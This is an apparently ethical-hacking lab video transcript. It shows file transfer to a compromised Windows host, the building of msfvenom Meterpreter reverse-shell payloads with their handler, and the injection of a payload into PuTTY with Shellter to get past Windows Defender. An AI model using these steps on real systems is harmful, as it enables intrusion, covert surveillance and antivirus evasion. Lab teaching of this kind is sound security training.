1 00:00:00,150 --> 00:00:06,630 OK, so before we can get into actually, you know, creating custom malware and explaining this one
2 00:00:06,630 --> 00:00:10,430 to CentOS, we have to talk about how to transfer our files over there in the first place.
3 00:00:10,710 --> 00:00:15,940 You know, if we want to be able to execute our custom, our executables, we have to be able to transfer
4 00:00:15,940 --> 00:00:17,410 it to the target system, of course.
5 00:00:17,790 --> 00:00:24,030 So thankfully, we can do this with pre-installed software on the target and also some things on Kali Linux.
6 00:00:24,270 --> 00:00:29,280 Another thing that we're going to download as well, but some methods of transfer, you know, include
7 00:00:29,430 --> 00:00:32,370 FTP, SCP and TFTP.
8 00:00:32,370 --> 00:00:36,650 So we're going to focus on TFTP and I'm going to show you how to do that.
9 00:00:36,660 --> 00:00:38,730 You can take your pick on which one you want to do.
10 00:00:39,000 --> 00:00:44,580 OK, so over on our Kali Linux machine first, and then what we're going to want to do is a sudo apt
11 00:00:44,580 --> 00:00:49,890 install, and the one that we're going to install is atftpd.
12 00:00:50,160 --> 00:00:57,120 Now, this is going to be the TFTP server, and it says I already have it installed.
13 00:00:57,690 --> 00:01:01,400 So you give it the sudo password.
14 00:01:01,620 --> 00:01:04,220 So it's going to say that I have the latest version installed.
15 00:01:04,800 --> 00:01:06,780 Also, I don't think that my thing's on the Internet either.
16 00:01:07,170 --> 00:01:11,010 So you're going to want to go ahead and install that, and then we need to make a directory that we're
17 00:01:11,010 --> 00:01:11,820 going to use for it.
18 00:01:11,840 --> 00:01:16,870 So we do sudo mkdir /tftp.
19 00:01:17,190 --> 00:01:23,820 So this is going to do a mkdir, make a directory in the root directory called tftp, so you can just go ahead
20 00:01:23,820 --> 00:01:25,420 and do that. I already have this created.
21 00:01:25,450 --> 00:01:26,430 So I'm not going to do that.
22 00:01:26,640 --> 00:01:28,350 I don't want to be in there.
23 00:01:28,980 --> 00:01:31,680 So then what we need to do is one more thing.
24 00:01:31,890 --> 00:01:40,450 I'm going to do sudo chown, and then we're going to put nobody /tftp here.
25 00:01:41,100 --> 00:01:43,410 This is just going to change the permissions of that.
26 00:01:43,410 --> 00:01:48,150 For that folder we created, just making nobody the owner is going to allow us to do the things that we
27 00:01:48,150 --> 00:01:50,280 need to do with this folder.
28 00:01:50,610 --> 00:01:57,390 So after you do that, we can start up the daemon, the service that we just saw.
29 00:01:57,420 --> 00:02:04,920 So the command for that is atftpd and then space dash dash daemon.
30 00:02:05,130 --> 00:02:09,390 Now, when you see the word daemon, that just means that the service is going to be running
31 00:02:09,600 --> 00:02:13,290 in the background and it's not going to be, like, outputting stuff onto a terminal.
32 00:02:14,490 --> 00:02:20,670 So then you have a space, dash dash port, and then we're going to put sixty-nine. That's the port that we're going
33 00:02:20,670 --> 00:02:22,370 to want to use then.
34 00:02:22,380 --> 00:02:28,050 We're going to put right here the directory that we're going to use as the home directory for TFTP.
35 00:02:28,050 --> 00:02:35,600 So this is going to be our /tftp folder, and then we may need to run it as sudo. I'm going to
36 00:02:35,600 --> 00:02:36,170 do it anyway.
37 00:02:36,570 --> 00:02:40,020 So, and then bam, now we have it running.
38 00:02:40,050 --> 00:02:43,800 So now we can go over to our compromised host.
39 00:02:44,070 --> 00:02:47,700 We can just rdesktop over to it.
40 00:02:48,120 --> 00:02:50,220 Let's do rdesktop.
41 00:02:52,690 --> 00:03:01,270 And then the IP, one six eight, five, six, two, one, and to make things easier every
42 00:03:01,270 --> 00:03:04,780 time you do -d and declare the domain.
43 00:03:04,790 --> 00:03:12,820 So we know the domain name is Ethical Hacking Lab, and then -u, you put the user, so we know the
44 00:03:12,820 --> 00:03:21,560 user is victim, and then we just hit enter and then it should connect us over. Just give it a second
45 00:03:21,570 --> 00:03:22,230 and we're good to go.
46 00:03:22,480 --> 00:03:27,670 OK, so what we can do, the first thing we want to do, like I said, is open up a command prompt.
47 00:03:27,880 --> 00:03:32,320 So just type in the search bar CMD, and then now we can try TFTP.
48 00:03:32,530 --> 00:03:35,380 So Windows has it natively installed.
49 00:03:35,470 --> 00:03:44,530 So we're going to do tftp, and then we're going to put -i, and then we're going to put the address
50 00:03:44,530 --> 00:03:49,300 of our Kali Linux box, one zero one six eight five six one two seven.
51 00:03:49,870 --> 00:03:53,680 And then we'll do GET, and then we're going to put the filename.
52 00:03:53,710 --> 00:04:03,040 So right now I have, in this /tftp folder, I have a file called testfile.txt.
53 00:04:03,940 --> 00:04:10,570 So we're going to go ahead and get that. It's already copied over, so let me delete that and now let's do it
54 00:04:10,570 --> 00:04:10,960 again.
55 00:04:12,780 --> 00:04:18,900 And so now transfer successful. As we can see, this file is back here and if we open it up,
56 00:04:19,440 --> 00:04:27,030 hey, this is a test text file, so you can try to put any file over into that directory, that TFTP directory,
57 00:04:27,030 --> 00:04:30,430 and then copy it over, then you should be able to copy it to the host.
58 00:04:30,870 --> 00:04:37,890 OK, so remember how we started the Apache service before when we were putting up the spoof website.
59 00:04:38,160 --> 00:04:43,470 So we're going to kind of use that as well, and we can use that for file transfer and actually access
60 00:04:43,470 --> 00:04:46,890 the files that we put up here from our compromised host.
61 00:04:47,130 --> 00:04:50,790 So what we can do is actually just start up the service again.
62 00:04:50,970 --> 00:04:56,290 So sudo service apache2 start.
63 00:04:57,270 --> 00:05:05,190 And then once that's started up, remember, the home directory is the /var/www/html folder.
64 00:05:05,190 --> 00:05:07,460 So what we can do is actually copy stuff over there.
65 00:05:07,470 --> 00:05:10,340 So there's a folder here.
66 00:05:10,350 --> 00:05:17,610 So this is a sudo; there's a folder on Kali Linux that has a bunch of Windows binaries, so let's see the
67 00:05:17,610 --> 00:05:18,560 basic one over here.
68 00:05:19,260 --> 00:05:20,430 So we're going to cp.
69 00:05:20,640 --> 00:05:32,100 So /usr/share/windows-resources/binaries, and then we have a wide variety that we
70 00:05:32,100 --> 00:05:33,390 can provide here.
71 00:05:33,600 --> 00:05:36,850 We see we have netcat that we can put over there.
72 00:05:36,870 --> 00:05:38,940 So based on that, whatever we wanted to use it for.
73 00:05:38,940 --> 00:05:42,380 Maybe we can put like a reverse, like a bind shell over there.
74 00:05:42,390 --> 00:05:44,180 So we can always connect over to it.
75 00:05:44,670 --> 00:05:52,400 We're going to do whoami.exe. You see, we're going to copy that over to our /tftp.
76 00:05:52,650 --> 00:06:04,080 We're going to copy it over to our /var/www, or /var/www/html folder. Once you copy it over there,
77 00:06:04,410 --> 00:06:07,560 we can go to our compromised host and see if we can access the file.
78 00:06:07,780 --> 00:06:09,520 OK, so we're back on our compromised host.
79 00:06:10,020 --> 00:06:14,770 So let's open up a browser, and what we're going to do is we're going to type in the IP address, that same one
80 00:06:14,770 --> 00:06:19,070 right there that we used when we did the spoof, because remember, we technically, you know,
81 00:06:19,080 --> 00:06:20,160 captured the creds.
82 00:06:21,060 --> 00:06:23,520 That's the address of my Kali machine.
83 00:06:23,530 --> 00:06:29,950 So we're going to put the slash and then we're going to type in the whoami.exe and see what happens.
84 00:06:30,150 --> 00:06:35,400 So now it's asking us, hey, do we want to run it or save it, so we can just save it.
85 00:06:36,000 --> 00:06:40,580 And then now we have that folder, open folder just to verify.
86 00:06:40,590 --> 00:06:44,060 Now we have this file locally on the system.
87 00:06:44,070 --> 00:06:49,230 So now we know two methods of actually file transferring to our compromised host.
88 00:06:49,480 --> 00:06:52,270 So now we can go ahead and create custom malware.
89 00:06:52,770 --> 00:07:00,150 OK, so before we do this, I'm going to show you guys just, like, the basic way of creating malware, and
90 00:07:00,810 --> 00:07:02,830 then we're going to do it a different way.
91 00:07:02,850 --> 00:07:06,600 So first, what you're going to need to do is actually disable Windows Defender.
92 00:07:06,810 --> 00:07:08,220 Because it will block it.
93 00:07:08,490 --> 00:07:14,580 But we're going to go over how to get past it later on, so you can just type in Windows Defender
94 00:07:14,580 --> 00:07:19,740 and you can probably just click on virus protection and let this load up.
95 00:07:20,040 --> 00:07:31,170 And what we're going to do is actually scroll down to Virus & threat protection, Manage settings,
96 00:07:31,170 --> 00:07:34,200 and let's turn off real-time protection.
97 00:07:34,980 --> 00:07:40,620 And we technically know that this is for demo use, of course.
98 00:07:40,840 --> 00:07:44,540 So it's going to ask for an administrative account to actually do this.
99 00:07:44,540 --> 00:07:47,540 So I'm going to give it a second to load up, and there we go.
100 00:07:48,090 --> 00:07:53,250 So, Administrator, because, you know, we technically made the account so we know the password.
101 00:07:54,600 --> 00:07:57,630 And so now we have the real-time protection off, so
102 00:07:57,630 --> 00:07:58,530 good to go.
103 00:07:58,560 --> 00:07:59,940 All this other stuff's already off.
104 00:08:00,060 --> 00:08:03,120 So now we have real-time protection off.
105 00:08:03,780 --> 00:08:08,960 So what we can do is actually freely copy, you know, malicious files over.
106 00:08:08,970 --> 00:08:15,330 So let's go back to our Kali Linux machine and let's try to create our first malware.
107 00:08:15,630 --> 00:08:21,850 OK, so in order to create our custom malware, there's a software called msfvenom.
108 00:08:22,320 --> 00:08:26,580 So that's the command that we're going to type in, and we're going to give it a bunch of arguments.
109 00:08:26,940 --> 00:08:31,350 msfvenom is just how you can actually create your custom malware, our custom payloads.
110 00:08:31,620 --> 00:08:33,690 So let's start to give it some arguments.
111 00:08:33,690 --> 00:08:38,370 So the first one is going to be -p, and then this is going to designate the payload.
112 00:08:38,370 --> 00:08:40,950 So we're, you know, going for Windows.
113 00:08:41,160 --> 00:08:43,470 So windows/meterpreter.
114 00:08:43,650 --> 00:08:45,550 So this means that we want to open up a
115 00:08:45,580 --> 00:08:53,610 Meterpreter shell. Pretty much a Meterpreter is like a program that allows us to remotely execute commands
116 00:08:53,610 --> 00:08:56,550 and, like, do all kinds of amazing stuff on the host.
117 00:08:57,030 --> 00:08:59,820 So we definitely want to try to get Meterpreter shells.
118 00:09:00,480 --> 00:09:05,280 And when I say shell, I just mean like a remote session, like a remote session or something like that.
119 00:09:06,300 --> 00:09:10,040 So then we're going to do reverse_https.
120 00:09:10,230 --> 00:09:12,290 So all that part means is that it's
121 00:09:12,510 --> 00:09:15,090 connecting back to our Kali Linux machine over
122 00:09:15,660 --> 00:09:17,660 HTTPS, to give us a little bit of encryption.
123 00:09:17,790 --> 00:09:23,040 So the next thing we're going to do is LHOST, and then we're going to put the Kali Linux machine IP
124 00:09:24,900 --> 00:09:27,120 address, and then we're going to do LPORT.
125 00:09:27,840 --> 00:09:32,580 So this is the port that it's going to connect over; this is the port that we're going to be listening for
126 00:09:32,940 --> 00:09:34,260 the connection to come back to.
127 00:09:34,320 --> 00:09:35,550 So four four four four.
128 00:09:35,580 --> 00:09:40,620 Let's just do that for now, and then -e, we're going to choose an encoder, and this is actually going
129 00:09:40,620 --> 00:09:43,800 to encode our payload.
130 00:09:43,810 --> 00:09:45,960 So it's not exactly detectable.
131 00:09:45,960 --> 00:09:48,840 It still will be in the state that we're doing right now.
132 00:09:49,260 --> 00:09:53,150 But there are ways that I'm going to show you to get past that.
133 00:09:53,820 --> 00:09:55,670 And along with that, we do dash
134 00:09:55,680 --> 00:09:57,670 i. I would like something like seven.
135 00:09:57,720 --> 00:10:03,090 So it's going to run it through the encoder like seven different times to kind of mix it up a little
136 00:10:03,090 --> 00:10:07,820 bit, jumble it up, and then -f, we're going to designate the file type.
137 00:10:08,010 --> 00:10:10,410 So we want to make an exe file.
138 00:10:10,470 --> 00:10:15,420 OK, and then we're going to give it -o, and then this is going to be the name of the output file.
139 00:10:15,660 --> 00:10:22,980 So let's just do exploit.exe, and then we can just hit enter and it's going to go through and create the
140 00:10:22,980 --> 00:10:26,150 payload. It usually takes about one or two minutes.
141 00:10:26,160 --> 00:10:28,950 So just give it a little bit of time. We'll come right back.
142 00:10:29,610 --> 00:10:38,160 OK, so our payload file finished being created, so we can do ls and then we can check it out.
143 00:10:38,170 --> 00:10:43,480 So we see that the file is our exploit.exe right here.
144 00:10:43,890 --> 00:10:47,060 So what we can do is actually copy this over.
145 00:10:47,070 --> 00:10:50,910 So I prefer TFTP; it's pretty quick, straight to the point.
146 00:10:50,910 --> 00:10:59,850 So sudo cp exploit.exe. I'm going to put this in the /tftp folder. Copied over here.
147 00:11:00,180 --> 00:11:02,460 I'm going to go back to my compromised host.
148 00:11:04,400 --> 00:11:13,950 And I'm going to do the same command, but I'm going to put exploit.exe, so let's see what happens.
149 00:11:13,970 --> 00:11:15,530 So transfer successful.
150 00:11:15,920 --> 00:11:19,580 So we see that the file is right here.
151 00:11:19,610 --> 00:11:27,080 So before we run it, we have to go ahead and actually go into Metasploit and actually get ready to catch
152 00:11:27,080 --> 00:11:29,670 this Meterpreter shell that's going to be coming back to us.
153 00:11:30,230 --> 00:11:33,710 So that is the reverse connection.
154 00:11:33,920 --> 00:11:41,720 So we're going to go back to our Kali and type msfconsole and hit enter, and then give
155 00:11:41,720 --> 00:11:44,940 this a minute to load, and it takes a minute or two as well.
156 00:11:44,960 --> 00:11:46,630 So we're going to come back once it's loaded.
157 00:11:47,270 --> 00:11:49,610 OK, so we have msfconsole up.
158 00:11:49,620 --> 00:11:58,150 So the first thing we're going to do, we want to do use exploit/multi/handler.
159 00:11:58,370 --> 00:12:04,400 And this is just what you can use to actually pretty much catch Meterpreter sessions that you're trying
160 00:12:04,400 --> 00:12:06,600 to set up typically, so hit enter.
161 00:12:06,980 --> 00:12:08,180 So now we're using that.
162 00:12:08,390 --> 00:12:15,620 So we're going to want to set the payload to the same payload as what's in our executable: set payload windows/
163 00:12:16,010 --> 00:12:16,700 meterpreter,
164 00:12:18,840 --> 00:12:28,130 meterpreter/reverse_https. So we set our payload.
165 00:12:28,280 --> 00:12:35,360 So now there's another command that we're going to want to do, which is set AutoRunScript, and then we're
166 00:12:35,360 --> 00:12:37,750 going to do post/windows/
167 00:12:37,880 --> 00:12:40,520 manage/migrate.
168 00:12:40,520 --> 00:12:46,010 This is going to make sure that, you know, our session migrates appropriately to the right process
169 00:12:46,010 --> 00:12:49,670 ID so that, you know, things really don't get dropped or run into issues.
170 00:12:49,790 --> 00:12:51,700 I want to make sure we have our connection solid.
171 00:12:51,890 --> 00:12:53,720 So now we just have to set our LHOST.
172 00:12:53,720 --> 00:12:57,290 So you do show options if you want to see what the different things you need to set are.
173 00:12:57,770 --> 00:13:11,150 So I'm going to set LHOST, one or two down one six eight five, six, seven. Set LPORT four four
174 00:13:11,150 --> 00:13:11,890 four four.
175 00:13:12,680 --> 00:13:16,580 And I could just do another show options just to check and make sure everything's right.
176 00:13:16,800 --> 00:13:18,310 The payload looks right.
177 00:13:18,320 --> 00:13:20,190 My address looks right.
178 00:13:20,540 --> 00:13:22,100 So now we're ready to launch.
179 00:13:22,140 --> 00:13:24,330 So let's go ahead and type exploit. Exploit.
180 00:13:24,360 --> 00:13:24,960 That's cool.
181 00:13:25,370 --> 00:13:32,610 So what we're going to do is just wait right here for a second, and now it started the reverse handler.
182 00:13:33,320 --> 00:13:38,890 So now our machine is listening for a connection over four four four four.
183 00:13:39,170 --> 00:13:44,420 So let's go back over to our Windows machine and let's try to launch this exe.
184 00:13:44,450 --> 00:13:49,820 So what I noticed is that when I run it one time, it didn't work, but when I double-click it twice,
185 00:13:50,030 --> 00:13:52,660 it typically connects over. Sometimes it connects the first time.
186 00:13:52,970 --> 00:13:56,620 But if it doesn't work the first time that you double-click it, just go ahead and go back.
187 00:13:56,650 --> 00:13:59,000 So you double-click and see what happens.
188 00:13:59,900 --> 00:14:01,250 So it didn't do it.
189 00:14:01,700 --> 00:14:06,290 So let's just give it a second and just see if it worked.
190 00:14:06,440 --> 00:14:08,820 So just give it a minute; it might take a second to connect.
191 00:14:09,510 --> 00:14:12,470 OK, so now we have a return of the shell, as you can see.
192 00:14:13,220 --> 00:14:19,030 So you type in help and there's a lot of different commands that we can do, you know, over on here.
193 00:14:19,040 --> 00:14:22,730 So as you can see, you can record stuff on the microphone.
194 00:14:23,420 --> 00:14:30,860 You can check out the webcam, all kinds of stuff that you could enumerate, all kinds of information.
195 00:14:31,580 --> 00:14:37,820 We can, you know, dump what stuff they're typing, like, you know, with like a key, a key logger, all
196 00:14:37,820 --> 00:14:38,730 kinds of stuff.
197 00:14:38,990 --> 00:14:42,670 So Meterpreter is definitely helpful to you.
198 00:14:42,680 --> 00:14:44,910 You definitely want to aim to get a Meterpreter shell
199 00:14:44,910 --> 00:14:49,130 so when you're, you know, exploiting these systems.
200 00:14:49,490 --> 00:14:56,180 OK, so now we know how to put malware onto the system, but what about if Windows Defender or something
201 00:14:56,180 --> 00:14:56,750 is on?
202 00:14:57,200 --> 00:14:58,790 So it's going to detect stuff.
203 00:14:58,790 --> 00:15:02,930 So like, for example, I turned Windows Defender real-time protection back on.
204 00:15:03,230 --> 00:15:06,920 So if I actually go, let me see.
205 00:15:06,920 --> 00:15:08,450 Let me delete this file.
206 00:15:09,670 --> 00:15:15,370 I was actually not going to do it because Windows Defender probably had already found it, so
207 00:15:15,370 --> 00:15:20,810 we can't copy the file over anymore if we wanted to, if we try to do the same exact thing.
208 00:15:21,070 --> 00:15:22,000 It can't write.
209 00:15:22,270 --> 00:15:25,750 And then a problem with, you know, virus protection right here.
210 00:15:26,080 --> 00:15:30,220 So what we're gonna do is actually bypass the antivirus system.
211 00:15:31,120 --> 00:15:37,800 So the way that we can do that is just a series of steps and a software called Shellter.
212 00:15:37,810 --> 00:15:40,210 So let's go back to our machine and check that out.
213 00:15:40,600 --> 00:15:46,960 OK, so we're going to create a new payload with msfvenom again, and then we're going to do -p and
214 00:15:46,960 --> 00:15:54,130 then windows/meterpreter, and then this time we're going to do reverse_tcp
215 00:15:54,130 --> 00:16:03,850 connection, and then same thing as before, put our LHOST one on to the one six eight, six, seven, and then
216 00:16:03,850 --> 00:16:08,560 I'm going to do LPORT this time as port 80.
217 00:16:08,830 --> 00:16:10,210 You know, so I'm not too suspicious.
218 00:16:10,240 --> 00:16:10,510 All right.
219 00:16:10,780 --> 00:16:18,640 And then we'll be encoded again with the same exact encoder, shikata_ga_nai.
220 00:16:19,630 --> 00:16:20,440 There we go.
221 00:16:21,370 --> 00:16:25,110 And then we're going to iterate through seven times with the encoder.
222 00:16:25,510 --> 00:16:31,810 But this time we do -f, we're going to put it in a raw format.
223 00:16:31,990 --> 00:16:33,900 So it's not going to exactly be an exe.
224 00:16:34,210 --> 00:16:39,820 And then we're going to put that into a file that we're going to call met.bin.
225 00:16:40,360 --> 00:16:45,220 So this isn't exactly an executable file.
226 00:16:45,560 --> 00:16:53,470 We can still use this and inject it into an actual file and have that run when we put it onto the host,
227 00:16:55,060 --> 00:17:00,490 so we can go ahead and do that, give it a second and let that finish up, OK?
228 00:17:00,640 --> 00:17:06,430 So our new payload is complete, so we just do ls and actually verify that it's there.
229 00:17:06,700 --> 00:17:10,870 So if you look, we'll see our met.bin file right there.
230 00:17:11,050 --> 00:17:18,080 OK, so the next thing we're going to want to do is actually go and download PuTTY.
231 00:17:18,550 --> 00:17:20,930 So as you know, PuTTY is like a tool.
232 00:17:21,340 --> 00:17:27,160 So what we can do, I need to get on a connection right here and then get onto the Web.
233 00:17:27,580 --> 00:17:32,470 All I really have to do is just Google, like, PuTTY download or something.
234 00:17:32,480 --> 00:17:33,880 So that's all I'm going to do really quick.
235 00:17:34,690 --> 00:17:35,380 Let me get in.
236 00:17:35,380 --> 00:17:36,490 There they go.
237 00:17:36,490 --> 00:17:39,630 PuTTY download.
238 00:17:39,700 --> 00:17:40,330 There you go.
239 00:17:41,380 --> 00:17:44,290 And then it's like the first link that pops up.
240 00:17:45,220 --> 00:17:52,680 So you go to download, and what we're going to do is actually download the exe file, not the MSI file.
241 00:17:52,930 --> 00:17:59,050 So if you just scroll down, you'll see that there is a 32-bit and a 64-bit.
242 00:17:59,320 --> 00:18:01,210 You can grab either one.
243 00:18:01,210 --> 00:18:08,170 I, I have found success with the 32-bit, and actually that's what we need to use this other software
244 00:18:08,170 --> 00:18:12,970 that you can use to inject, you know, payloads into executables.
245 00:18:13,090 --> 00:18:17,540 But the one that we're using is actually going to use a 32-bit, but it can only take a 32-bit
246 00:18:17,560 --> 00:18:17,880 file.
247 00:18:17,900 --> 00:18:19,300 So we're going to download this.
248 00:18:20,930 --> 00:18:25,250 So you can download it and then it's going to be in your Downloads folder.
249 00:18:26,210 --> 00:18:27,820 I already have it.
250 00:18:27,980 --> 00:18:38,060 So I have a folder called payloads, and then I have this file right here, putty32.exe.
251 00:18:38,900 --> 00:18:45,830 So what I'm going to do, I'm going to back out really quick.
252 00:18:46,340 --> 00:18:52,400 I'm going to copy my met.bin into this payloads folder.
253 00:18:54,040 --> 00:18:55,610 See, there you go.
254 00:18:56,020 --> 00:19:06,500 So now let's go back to payloads, and then I have my PuTTY file, and copy it over here, so it's cp
255 00:19:06,670 --> 00:19:13,930 ~/Downloads and then it should be putty.
256 00:19:13,960 --> 00:19:15,610 I think I changed the putty name to.
257 00:19:16,900 --> 00:19:17,290 Yeah.
258 00:19:17,300 --> 00:19:21,180 So this is the default file name. Copy it over to here.
259 00:19:21,190 --> 00:19:23,210 So putty32.
260 00:19:23,320 --> 00:19:23,930 I see.
261 00:19:23,980 --> 00:19:29,500 I'm going to override the file that's in this directory that I'm in, and through sudo to do that.
262 00:19:30,730 --> 00:19:31,490 There we go.
263 00:19:31,510 --> 00:19:36,240 So now we have the stuff that we need in this folder.
264 00:19:36,760 --> 00:19:41,060 So the next thing we're going to do is actually install this application called Shellter.
265 00:19:41,350 --> 00:19:45,510 So you're going to do sudo apt install shellter.
266 00:19:45,850 --> 00:19:50,980 And when you try to do that, it's probably going to tell you that you have to do some other, a couple
267 00:19:50,980 --> 00:19:51,730 of other commands.
268 00:19:52,810 --> 00:19:56,950 So what you're going to need to do is sudo dpkg
269 00:19:57,010 --> 00:20:02,440 --add-architecture
270 00:20:03,220 --> 00:20:07,670 i386.
271 00:20:07,690 --> 00:20:17,320 And then it's just to give another apt command, sudo apt-get update, and then you need to
272 00:20:17,320 --> 00:20:19,890 do another apt command.
273 00:20:20,110 --> 00:20:30,940 So, sudo apt-get install wine32, and wine32 allows us to compile 32-bit
274 00:20:30,940 --> 00:20:34,540 Windows applications, you know, on our Linux machine.
275 00:20:34,700 --> 00:20:42,360 OK, so once you do that, you then start to try to install Shellter again. It's shellter with two L's.
276 00:20:43,360 --> 00:20:50,310 So once that's done and it's all downloaded, we can erase this and we're going to run Shellter.
277 00:20:50,710 --> 00:20:56,590 So let's go ahead and run sudo shellter. Sudo.
278 00:20:58,870 --> 00:20:59,500 So the.
279 00:21:00,700 --> 00:21:06,250 And then it's going to take a second, and it's going to pop up with this window, kind of a neat little
280 00:21:06,250 --> 00:21:09,580 graphic, Shellter, so choose operation mode.
281 00:21:09,940 --> 00:21:14,260 So what we're going to do, we want to do auto mode, and we're not going to worry too much.
282 00:21:14,740 --> 00:21:23,190 So now the PE target is going to be the file that we're going to inject our payload into, which is that
283 00:21:23,200 --> 00:21:24,300 met.bin file.
284 00:21:24,550 --> 00:21:34,480 So the file we're going to inject that payload into is, it's going to be /home/kali/
285 00:21:34,630 --> 00:21:41,250 payloads/putty32.exe.
286 00:21:41,290 --> 00:21:41,720 OK.
287 00:21:43,360 --> 00:21:50,230 So now it's going to say this next step takes like 30 to 60 seconds, so just give it some time. We'll
288 00:21:50,290 --> 00:21:51,000 come right back.
289 00:21:52,100 --> 00:21:58,880 OK, so our 60 seconds have passed, so now it's going to ask us if we want to enable stealth mode,
290 00:21:59,390 --> 00:22:05,150 where what this is going to do is kind of like stealthily put it in there so that the file will still
291 00:22:05,150 --> 00:22:08,960 execute as needed, as it is originally intended to.
292 00:22:09,110 --> 00:22:10,280 You could do that if you want.
293 00:22:10,280 --> 00:22:14,760 I found less success with that and actually got detected when I would do that.
294 00:22:14,770 --> 00:22:18,600 So we can do no for enable stealth mode.
295 00:22:19,250 --> 00:22:21,080 So now it's asking us for our payload.
296 00:22:21,130 --> 00:22:23,030 So you know what the payload is, it's a Meterpreter.
297 00:22:23,040 --> 00:22:28,010 So in terms of the payload, we want to do a custom one.
298 00:22:28,280 --> 00:22:31,810 So we're going to do a capital C, and it asks for the payload.
299 00:22:31,820 --> 00:22:35,240 So we're going to give it the full directory, /home,
300 00:22:35,510 --> 00:22:43,370 so /home/kali/payloads/met.bin.
301 00:22:43,490 --> 00:22:46,390 And then it's going to ask if it's a reflective DLL loader.
302 00:22:46,400 --> 00:22:49,100 We're just going to say no to that because it is not.
303 00:22:49,460 --> 00:22:54,470 And then now it's going to go through and inject it in there, and it's going to give you a confirmation
304 00:22:54,860 --> 00:22:56,240 and then you just hit enter.
305 00:22:56,450 --> 00:22:59,510 So there we go, injection verified, enter.
306 00:22:59,810 --> 00:23:08,630 And now we know that our putty32 file is now injected with our payload.
307 00:23:09,200 --> 00:23:14,630 So let's copy this over to our /tftp folder.
308 00:23:14,630 --> 00:23:19,070 So sudo cp putty32.exe
309 00:23:23,060 --> 00:23:27,150 to /tftp. Bam!
310 00:23:27,650 --> 00:23:29,520 So now we know that it's over there.
311 00:23:29,540 --> 00:23:35,630 So now the moment of truth. We're going to our compromised host.
312 00:23:35,640 --> 00:23:37,260 So let's try this again.
313 00:23:37,470 --> 00:23:40,720 Oh, I connected to the Internet, so it disconnected me from that.
314 00:23:40,730 --> 00:23:43,430 So give me a second and I'll get right back on here, OK?
315 00:23:43,440 --> 00:23:46,940 So I'm back connected to my host, so I'm going to try it again.
316 00:23:47,180 --> 00:23:52,190 But this time we're going to do putty32.exe.
317 00:23:52,910 --> 00:23:54,320 Now let's see what happens.
318 00:23:55,430 --> 00:23:56,680 Oh, it's already here.
319 00:23:56,690 --> 00:23:58,360 So actually I need to delete this file.
320 00:23:58,360 --> 00:23:59,170 So give me a second.
321 00:23:59,300 --> 00:24:01,910 I need to delete this one; it's a friend of mine.
322 00:24:01,910 --> 00:24:02,670 Give me trouble.
323 00:24:02,670 --> 00:24:04,160 Let me try to delete this really quick.
324 00:24:06,670 --> 00:24:07,620 There we go, cool.
325 00:24:07,910 --> 00:24:10,500 OK, so that's deleted, so sorry about that.
326 00:24:11,790 --> 00:24:20,030 There we go, transfer successful. So before, when we tried to transfer the exploit.exe
327 00:24:20,070 --> 00:24:27,480 file, it couldn't write it because Windows Defender was detecting it as malware.
328 00:24:27,690 --> 00:24:33,540 But now, after we went through Shellter and injected it into an innocent file,
329 00:24:34,540 --> 00:24:43,780 now it's undetectable by antivirus, so we can confirm that it's over here, putty32, so we know that
330 00:24:43,780 --> 00:24:44,570 that is there.
331 00:24:45,430 --> 00:24:50,530 So what we can do now, we need to go back before, before we execute it.
332 00:24:51,040 --> 00:24:53,390 We need to go launch msfconsole again.
333 00:24:53,410 --> 00:24:54,540 So I already have it up here.
334 00:24:54,760 --> 00:24:57,730 So the only thing we're going to do here is actually change the payload.
335 00:24:57,730 --> 00:25:02,430 So it's set payload, and actually change the payload: windows
336 00:25:02,700 --> 00:25:10,600 /meterpreter/reverse_tcp.
337 00:25:10,810 --> 00:25:11,360 There we go.
338 00:25:12,100 --> 00:25:15,720 So now we're also going to set LPORT 80.
339 00:25:17,270 --> 00:25:24,610 We're going to exploit, and it's going to, we have to do this as, actually I'm going to guess, I actually
340 00:25:24,610 --> 00:25:26,440 know, because Apache is running.
341 00:25:26,440 --> 00:25:28,890 So let's actually close off Apache right now.
342 00:25:29,350 --> 00:25:35,620 So sudo service apache2 stop.
343 00:25:37,370 --> 00:25:39,420 So now port 80 should be free.
344 00:25:39,440 --> 00:25:41,360 So now we should be able to exploit.
345 00:25:42,900 --> 00:25:48,650 Permission denied, so you need to be root, so I'm going to exit out, of course, and sudo.
346 00:25:48,690 --> 00:25:49,310 I'll be right back.
347 00:25:50,030 --> 00:25:52,760 OK, so I got everything back and running as sudo.
348 00:25:52,770 --> 00:25:54,720 So those are our options.
349 00:25:54,720 --> 00:25:56,250 We have our Kali Linux machine there.
350 00:25:56,470 --> 00:25:58,320 We're going to be listening over 80.
351 00:25:58,530 --> 00:26:00,300 So let's go ahead and type in run.
352 00:26:00,510 --> 00:26:02,730 And now we've got the same as before.
353 00:26:03,030 --> 00:26:05,690 Started reverse TCP handler on port 80.
354 00:26:05,850 --> 00:26:11,100 So now our machine is listening for a connection, a specific connection over port 80.
355 00:26:11,520 --> 00:26:13,770 So let's go right to our host.
356 00:26:14,100 --> 00:26:16,470 And I just have to execute this file, as it happens.
357 00:26:17,050 --> 00:26:22,800 So once again, you might have to execute it a couple of times for it to actually, you know, make that connection
358 00:26:22,800 --> 00:26:23,090 back.
359 00:26:23,110 --> 00:26:23,910 But this happens.
360 00:26:24,570 --> 00:26:27,180 What I mean by the boom, it might take a couple of tries.
361 00:26:27,180 --> 00:26:29,280 So go ahead and try it again and give it a second.
362 00:26:29,520 --> 00:26:32,070 You see the little spinning, the circle right there spinning.
363 00:26:32,070 --> 00:26:33,090 So something's happening.
364 00:26:33,390 --> 00:26:35,250 So it's trying to reach out and make a connection.
365 00:26:35,250 --> 00:26:38,280 So let's try to open it again and see what happens.
366 00:26:38,900 --> 00:26:45,420 OK, so we gave it a second, and now we're starting to actually capture that connection back to our machine.
367 00:26:45,570 --> 00:26:48,660 It just did the migration successfully and we're good to go.
368 00:26:48,660 --> 00:26:54,900 So now we have a Meterpreter shell again, and we did that by bypassing antivirus.
369 00:26:55,260 --> 00:26:56,220 That is amazing.
370 00:26:56,220 --> 00:27:02,790 So now you have the power to bypass antivirus, whatever exe you make. You just have to make sure that you
371 00:27:02,790 --> 00:27:03,830 do follow these steps.
372 00:27:03,850 --> 00:27:04,630 You'd be good to go.
373 00:27:04,890 --> 00:27:12,270 So now you have Meterpreter and can do all kinds of stuff like install a key logger, for privilege escalation
374 00:27:12,270 --> 00:27:14,250 stuff, more system enumeration.
375 00:27:14,490 --> 00:27:20,520 Once again, you can just type in help and you can see all kinds of stuff, and you can try different
376 00:27:20,520 --> 00:27:22,890 commands and just play around with it.